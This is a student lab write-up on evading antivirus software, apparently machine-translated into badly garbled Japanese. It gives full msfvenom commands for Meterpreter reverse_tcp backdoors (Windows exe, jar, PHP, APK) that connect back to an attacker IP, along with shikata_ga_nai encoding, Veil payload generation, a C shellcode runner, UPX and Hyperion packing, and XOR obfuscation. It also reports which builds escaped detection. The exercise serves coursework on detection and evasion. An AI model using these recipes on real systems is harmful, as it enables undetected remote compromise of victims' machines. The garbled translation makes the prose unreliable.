20175213のLvzheng香港EXP3回避殺傷原則と実践に対する2019-2020-2ネットワーク技術

まず、実験的なタスク

• 方法

  • 適切な使用のMSFエンコーダ

  • 他の文書生成msfvenomジャーなど

  • ベール

  • パッカー

  • C +シェルコードを使用してプログラミング

  • 他の教室には、方法を説明していません

• 様々な技術のアプリケーションを殺す避けるために、悪質なコードの組み合わせにより実現しました。
  （成功した殺害を避けるために達成した場合は、簡単な言語は、ないショットを原理を説明する。共生のソフトを殺す結果とスクリーンショットを確認すること。）

• 上のソフトを殺すの場合には、他のコンピュータを用いて測定し、さらにはコンピュータの名前でマークされたソフトのバージョンを殺す、成功するために戻って実行します。

第二に、基本

悪意のあるコードの検出メカニズム

• 1.シグネチャに基づく検出

  • 署名の短い期間でデータの1つのまたは複数です。そのようなデータを含む実行可能ファイル（または実行する他のライブラリ、スクリプトなど）が悪意のあるコードと見なされた場合。

• 2.ヒューリスティックのマルウェア検出

  • 「私はアヒルのようなアヒルと泳ぐように歩くとアヒルのように鳴く鳥を見るとき、私は鴨その鳥を呼ぶ。」マルウェアの検出、ソフトウェアは物事を通常のドライマルウェアである場合それをマルウェアとマルウェアのように見えますが、我々はそれを取りました。そのような悪質なWebサイト、開いているポート、変更システムファイル、シグネチャファイル自体、構造、メーカーやその他の情報などの典型的な「ルックアンドフィール」を接続するなどの典型的な行動。各メーカーが独自の検出モードを定義します。

• 3.行動ベースのマルウェアの検出

  • 理論的には、行動ベースの検出は、ヒューリスティックに相当し、またはヒューリスティック行動監視を含むことです。

無料原則（脱税Anti-Virusを）殺すために

• 1.変更した署名

  • そこEXE - パッカー：圧縮、暗号シェルケース。

  • そこ（Meterpreterなど）シェルコード - 実行可能ファイルを再コンパイル基づくエンコード/ペイロードによってコードされます。

  • ソースコード - 他の言語で書き換え、再コンパイル（ベール - 脱税）。

• 2.変化挙動

  • コミュニケーション：リバウンド接続/トンネル技術/通信データの暗号化を利用すること

  • 操作モード：メモリ動作基づい/減速システムの正常機能コード交絡の変更/追加

• 3.型破りな方法

  • MSFへの書き込みの攻撃コードとして、バックドアとして脆弱なアプリケーションを使用します。

  • 社会階級の攻撃、AVソフトオフトリックの目標を使用してください。

  • 悪意のあるソフトウェアを手作り。

第三に、解答への質問（答えへの基本的な知識に基づいて）

質問1：悪質なコードを検出する方法ソフトを殺しますか？

• シグネチャベースの検出：データが含まれている実行ファイル（または実行する他のライブラリ、スクリプトなど）がマークされている場合の特性は、悪意のあるコードと考えられています。

• ヒューリスティックのマルウェア検出：ソフトウェアは、通常のドライマルウェア行うがある場合は、マルウェアのように見えるが、それは悪質なソフトウェアとして扱われます。

• 挙動ベースのマルウェア検出：ヒューリスティックと等価であるか、またはヒューリスティック行動監視に参加しました。

質問2：回避の殺害に何をしていますか？

• だから、悪意のあるコードが殺害ソフトキルを逃れることができます。同時に、侵入テストを殺すためにも、自由に技術を使用する必要があります。

質問3：基本的な方法は何殺害を回避するには？

• 異なる署名：EXEファイル操作のための、またはエンコードまたはシェルコードペイロードにパッカーを再コンパイルベースの実行可能ファイルで符号化されます。

• 変化挙動：使用リバウンド接続、データトンネリングと暗号化通信。コードの正常な機能を追加するとき、システムへの変更を最小限にします。

• MSFへの書き込みの攻撃コードとして、バックドアとして脆弱なアプリケーションを使用します。

• 社会階級の攻撃、AVソフトオフトリックの目標を使用してください。

• 悪意のあるソフトウェアを手作り。

質問4：絶対に悪質なコンピュータコードを防ぐことができ、ソフトを殺すを回し？

• いいえ、進行中のキルソフトは、悪質なコード技術も変化し続ける、我々は行うことができます良いオンライン習慣を開発し、いつでもソフトを殺すウイルスデータベースの更新、ソフトキルの正常な動作を確保することです。

第四に、実験の内容

タスク1：ベール - 脱税、のようなjarファイルを生成し、他の文書などMSFエンコーダ、msfvenomの適切な使用、回避の殺害に独自のシェルコードのプログラミングツールやテクニックを使用

MSFのエンコーダは、exeファイルを生成し、

• 第二の実験で生成20175213_backdoor.exeすることにより、バックドアをVirusTotalし、VirSCAN二つの部位を検出しました。

• スキャン結果は、ソフトウェア72を59で検出されるVirusTotalを、使用された後

• VirSCANスキャンを使用する場合は、ファイルを選択し、ウィンドウで立ち往生したときに、スマートスキャンをクリックして応答しない、サーバーが一時的に未解決の問題です。

• ここでコード化されたバックドアに一度：

  • コマンドは次のとおりです。msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b '\x00' LHOST=192.168.111.130 LPORT=5213 -f exe > bd1.exe

  • 前記-e選択されたエンコーダと、-b文字がするためには、ペイロードにクリアされる\x00'シェルコードには表示されません。

  • 図生成プロセス：

    

  • 以下を使用してVirusTotal検出：

    

• 十回コード：

  • 使用する-i反復回数を設定します。

  • コマンドは次のとおりです。msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b '\x00' LHOST=192.168.111.130 LPORT=5213 -f exe > bd10.exe

  • 図生成プロセス：

    

  • 以下を使用してVirusTotal検出：

    

• 結果はあまり助けを殺すために自由をコードする多くの、上から見ることができます。見る同級生のブログ記事を、私は二つの理由があることを知っています：

  • 常に（デコーダスタブ）exeファイルを結合する必要性の一部がデコードされます1.shikata_ga_nai、ソフトを殺すだけで悪質なコードを検出することができた、この部分を見つけます。

  • 2.msfvenomの合計は、EXEファイルを生成するためのテンプレートを修正しました。これは、すべてのexeファイルを生成し、またはデフォルトパラメータテンプレート場合、ある一定の特徴があるので、一般に、AVベンダーは我々が悪質なコードを生成するすべてのmsfvenomを解決できるように、テンプレートMSFのために使用される署名を検出し生成します。

使用すると、他の形式のファイルを生成するMSF

• jarファイルを生成します。

  • コマンドは生成します。msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.111.130 LPORT=5213 x> 20175213java.jar

  • 図生成プロセス：

    

  • 以下を使用してVirusTotal検出：

    

    

• PHPファイルを生成します。

  • コマンドは生成します。msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.111.130 LPORT=5213 x> 20175213php.php

  • 図生成プロセス：

    

  • 次VirusTotal（jarファイルよりも優れた効果）を使用して、検出：

    

• APKファイルを生成しました：

  • コマンドは生成します。msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.111.130 LPORT=5213 x> 20175213android.apk

  • 図生成プロセス：

    

  • 以下の（一般的な効果）を用いVirusTotal検出：

    

利用ベール - 脱税生成と検出バックドア

• コマンドラインを入力sudo apt-get install veilベール、入力を選択する最初の場所の必要性をインストールしますy。

• 入力段の完了後、再veilインストールを続行し、入力しますy。

• 長い待ち時間と再試行の後、ついにベールを設置。

• インストールが成功した後、入力モードはsudoでveilコマンドを入力します。

• 入力use evasionベール-脱税にコマンドを。

• コマンドを入力しuse c/meterpreter/rev_tcp.py 、設定インターフェイスを入力します。

• （IPカーリー）リバウンドに接続されたIPアドレス、コマンドを設定しset LHOST 192.168.111.130、そしてportコマンドを設定しますset LPORT 5213。

• 入力コマンドgenerateファイルを生成して、生成されたplayloadの名前を入力するveil_c_5213、パスを保存します/var/lib/veil/output/source/veil_c_5213.exe。

• VirusTotalとして検出結果を用いて

使用シェルコードプログラミング

• コマンド：msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.111.130 LPORT=5213 -f c次のように期間シェルコードを生成し、ショットは以下のとおりです。

• Cカリファイル、コマンド作成しvim 20175213.c、生成されたBUF []に割り当てられた次のコードを：

unsigned char buf[] = 
(复制的内容)

int main() 
{ 
    int (*func)() = (int(*)())buf; 
    func(); 
}

• コマンドi686-w64-mingw32-g++ 20175213.c -o 20175213.exe の実行可能ファイルへの.cファイルを変換するためのコマンド。

• 次VirusTotalを使用して検出

• プログラムは、Windows上で実行されると、ソフト殺害を殺していない（テンセントコンピュータマネージャが認識しない場合があります）

パッカー

1.圧縮工具ハウジングUPX

• コマンドを使用するupx 20175213.exe -o 20175213_upxed.exe前のステップを生成するために20175213.exe追加の圧縮シェルを得ること20175213_upxed.exe。

• 検出結果を用いてVirusTotal：

• プログラムを実行した後、コンピュータではなくバトラーテンセント認識.....

2.暗号化シェルツールハイペリオン

• コマンドによってwine hyperion.exe -v 20175213_upxed.exe 20175213_upxed_Hyperion.exe二次パッカー。

• 以下のように検出結果を用いてVirusTotal：

• Windowsでは、また同定されていないプログラムテンセントコンピュータの執事を実行します。

コースはカバーされていない他の方法

• シェルコードの変形殺すために自由です：

  • msfvenomでシェルコードを生成します。

  • シェルコードの各位置「0」XOR。

  • 再のシェルコード0で順次XOR XOR、オブジェクトが検出されたソフト殺さの確率を低減することができるシェルコード署名を除去することです。

  • 実行ファイルとして生成された最終シェルコード。

• 検出結果を用いてVirusTotal：

タスク2：殺害を避けるために様々な技術を適用して、悪意のあるコードの組み合わせを達成するために

• シェルコードはmsfvenomを使用RAW形式を生成し、シェルコードShellcodeWrapper XORの使用が暗号化され、C ++ EXEコンパイルされたソースコードを生成する：組成物を考え

• 検出以下のスクリーンショット360（それほどセキュリティマネージャテンセント以来...）

タスク3：測定しても、コンピュータの名前の付いたソフトのバージョンを殺す、成功するためのソフトを殺すの場合には、別のコンピュータを使用して、実行バック

• 1.ルーwin7のシステムの前に先生は、DIR詳細はスクリーンショットを参照してください。
• 2.ソフトキル名：360セキュリティマネージャ
• 3.バージョン：12.0.0.2002

第五に、実験や問題を解決します

質問1：

• 使用ファイルはエラーとして、コンパイルされているシェルコードのプログラミング、：

• 解決方法：のビューでは、学生のブログ、コマンドライン入力sudo apt-get install mingw-w64設置環境のために必要とすることができます。

質問2：

• ベールをインストールするときにハングアップし、他のリモートエラーが発生しました、そしてインストールが中断されました。

• ソリューション：忍耐、忍耐をインストールし、最終的には成功します。

質問3：

• ハイペリオンの道シェルツールを暗号化する場合に示すように、問題が発生しました

• ソリューション：見た後丁Wentao学生のブログ、アクセス[関連情報]ポスト（https://blog.csdn.net/weixin_36711901/article/details/103217022）、ハイペリオンプログラム再コンパイル。須藤モードで動作するようにしないと、そうでない場合に、コピーするには、パッカーとhyperion.exe一緒がコピーされません、同じフォルダにあるように、このステップ、パッカーとhyperion.exeメモコマンドライン操作コマンドcp 原目标文件路径/文件名 目标路径

第六に、感情や経験

この実験はまた、二日目の夜を取得するには正午から、完全に2得点、主要な長距離走です。インストールのベールはまた、インストールの亀の速度を腹立たしいされ、様々な割り込みエラー.... 検査の時にも、常に自分自身を向上させることができ、しかし、幸いなことに、それはこの実験が成功裏に完了した、だけでなく、便利で楽しいたくさんのことを学びました。